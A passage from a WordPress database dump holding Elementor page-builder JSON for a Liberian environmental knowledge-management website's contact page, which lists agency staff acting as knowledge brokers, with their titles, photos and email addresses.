\\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>NaFAA<br \\/>Monitoring, Control, and Surveillance Field Officer <\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>NaFAA<br \\/>Small Scale Fisheries Officer<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b10d67e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23313,3384,'_elementor_edit_mode','builder'),(23314,3384,'_elementor_template_type','wp-page'),(23315,3384,'_elementor_version','3.0.16'),(23316,3384,'_wp_page_template','default'),(23317,3384,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong>\\nManager, ESIA\\nDepartment of Compliance and Enforcement\\nEPA\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely<\\/strong><br \\/>EIA Manager, FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><\\/p><p>Director, MOA<\\/p><p><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager, LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a 